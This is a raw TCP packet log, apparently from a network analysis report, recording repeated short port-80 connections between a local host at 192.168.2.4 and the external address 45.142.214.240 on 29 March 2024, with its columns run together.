                                                                        Mar 29, 2024 12:59:14.470706940 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.590461016 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.590784073 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.806943893 CET804975945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.807013988 CET4975980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.815876007 CET804976045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:14.815963030 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:14.816267967 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.038817883 CET804976045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.117500067 CET804976045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.117611885 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.233782053 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.234560013 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.452126026 CET804976145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.452214003 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.452589989 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.456139088 CET804976045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.456209898 CET4976080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.669976950 CET804976145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.754421949 CET804976145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:15.754576921 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.874087095 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:15.874305964 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.091888905 CET804976145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.091959953 CET4976180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.093633890 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.093803883 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.093878984 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.313704014 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.402996063 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.403068066 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.512774944 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.732244015 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.811521053 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:16.811726093 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:16.918884993 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.138339043 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.222748041 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.222810984 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.340646029 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.340984106 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.560899973 CET804976245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.560928106 CET804976345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.561058998 CET4976280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.561110973 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.561358929 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.783201933 CET804976345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.862667084 CET804976345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:17.862726927 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.981065035 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:17.981394053 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.200515032 CET804976345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.200572014 CET4976380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.200723886 CET804976445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.200798988 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.201076984 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.420671940 CET804976445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.507728100 CET804976445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.507811069 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.621975899 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.622370958 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.841510057 CET804976445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.841609955 CET4976480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.841814995 CET804976545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:18.841892004 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:18.842102051 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.061404943 CET804976545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.143948078 CET804976545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.144013882 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.262618065 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.262969971 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.482247114 CET804976545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.482352972 CET4976580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.483397961 CET804976645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.483479977 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.483683109 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.704222918 CET804976645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.782752991 CET804976645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:19.782895088 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.903650999 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:19.903997898 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.123720884 CET804976745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.123826027 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.124058962 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.124609947 CET804976645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.124665022 CET4976680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.344058990 CET804976745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.427427053 CET804976745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.427565098 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.543848991 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.544298887 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.761734009 CET804976845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.761897087 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.762171030 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.763187885 CET804976745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:20.763252974 CET4976780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:20.979815006 CET804976845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.058628082 CET804976845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.058749914 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.173156023 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.173969984 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.390919924 CET804976845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.390978098 CET4976880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.393568993 CET804976945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.393639088 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.394081116 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.613420010 CET804976945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.699054003 CET804976945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:21.699121952 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.813805103 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:21.814130068 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.033262014 CET804976945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.033354998 CET4976980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.033576965 CET804977045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.033663034 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.033828974 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.253478050 CET804977045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.338841915 CET804977045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.338975906 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.465507030 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.465830088 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.683783054 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.683871984 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.684058905 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.685347080 CET804977045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.685400963 CET4977080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:22.901575089 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.981014013 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:22.981100082 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.090769053 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.308481932 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:23.392504930 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:23.392570972 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.512465954 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.512820959 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.730604887 CET804977145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:23.730724096 CET4977180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.731539965 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:23.731632948 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.732156038 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:23.950818062 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.030029058 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.030236006 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.138039112 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.357271910 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.440438032 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.440499067 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.559335947 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.559639931 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.777475119 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.777570009 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.777762890 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.779717922 CET804977245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:24.779778004 CET4977280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:24.995261908 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:25.074517965 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:25.074572086 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:25.184508085 CET4977380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:25.401913881 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:25.488177061 CET804977345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.186692953 CET4979580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.400142908 CET804979645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.487411022 CET804979645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.487473011 CET4979680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.606403112 CET4979680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.606725931 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.822721958 CET804979645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.822889090 CET4979680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.825920105 CET804979745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:44.825992107 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:44.826159954 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.046700001 CET804979745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.124955893 CET804979745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.125025988 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.247061014 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.247359991 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.463677883 CET804979845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.463754892 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.464018106 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.466136932 CET804979745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.466201067 CET4979780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.680372953 CET804979845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.771872997 CET804979845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:45.771931887 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.887736082 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:45.888058901 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.105206013 CET804979845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.105282068 CET4979880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.107984066 CET804979945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.108061075 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.108211040 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.330605030 CET804979945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.415388107 CET804979945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.415463924 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.528198957 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.528520107 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.748430014 CET804979945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.748451948 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:46.748589993 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.748593092 CET4979980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.748719931 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:46.968141079 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.047234058 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.047293901 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.153192043 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.372972965 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.457124949 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.457170010 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.576144934 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.576431990 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.792754889 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.792870045 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.793024063 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:47.795660973 CET804980045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:47.795717001 CET4980080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.011859894 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.091517925 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.091578007 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.200098038 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.417154074 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.501480103 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.501543999 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.621951103 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.622248888 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.838170052 CET804980145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.838246107 CET4980180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.841402054 CET804980245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:48.841489077 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:48.841670036 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.060973883 CET804980245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.144664049 CET804980245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.144726992 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.262414932 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.262686014 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.480196953 CET804980345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.480315924 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.480505943 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.481689930 CET804980245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.481743097 CET4980280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.698110104 CET804980345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.777338028 CET804980345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:49.777417898 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.889538050 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:49.890211105 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.106987000 CET804980345.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.107059002 CET4980380192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.108954906 CET804980445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.109025955 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.109189034 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.327917099 CET804980445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.411803961 CET804980445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.411864996 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.528037071 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.528322935 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.745785952 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.745870113 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.746015072 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.746835947 CET804980445.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:50.746895075 CET4980480192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:50.963309050 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.042684078 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.042742014 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.153063059 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.371093035 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.456732988 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.456808090 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.575130939 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.575413942 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.792578936 CET804980545.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.792664051 CET4980580192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.794009924 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:51.794078112 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:51.794274092 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.013370037 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.092668056 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.092844009 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.205310106 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.424259901 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.510409117 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.510499001 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.622145891 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.622478008 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.841006994 CET804980645.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.841104031 CET4980680192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.843002081 CET804980745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:52.843080997 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:52.843293905 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.063891888 CET804980745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.149842978 CET804980745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.149954081 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.262649059 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.262938976 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.482333899 CET804980845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.482418060 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.482568979 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.483175039 CET804980745.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.483247042 CET4980780192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.704027891 CET804980845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.783272982 CET804980845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:53.783354044 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.903332949 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:53.903671026 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.123467922 CET804980945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.123524904 CET804980845.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.123651981 CET4980880192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.123673916 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.123874903 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.343255997 CET804980945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.431598902 CET804980945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.431680918 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.544033051 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.544481039 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.762186050 CET804981045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.762270927 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.762451887 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.763847113 CET804980945.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:54.763920069 CET4980980192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:54.980247021 CET804981045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.064431906 CET804981045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.064593077 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.184916973 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.185239077 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.403759956 CET804981045.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.403790951 CET804981145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.403845072 CET4981080192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.403928995 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.404428959 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.622071028 CET804981145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.707166910 CET804981145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:55.707335949 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.825649023 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:55.826124907 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.043406010 CET804981145.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.043534994 CET4981180192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.048418045 CET804981245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.048558950 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.055876970 CET4981280192.168.2.445.142.214.240
                                                                        Mar 29, 2024 12:59:56.281380892 CET804981245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.367341995 CET804981245.142.214.240192.168.2.4
                                                                        Mar 29, 2024 12:59:56.367490053 CET4981280192.168.2.445.142.214.240
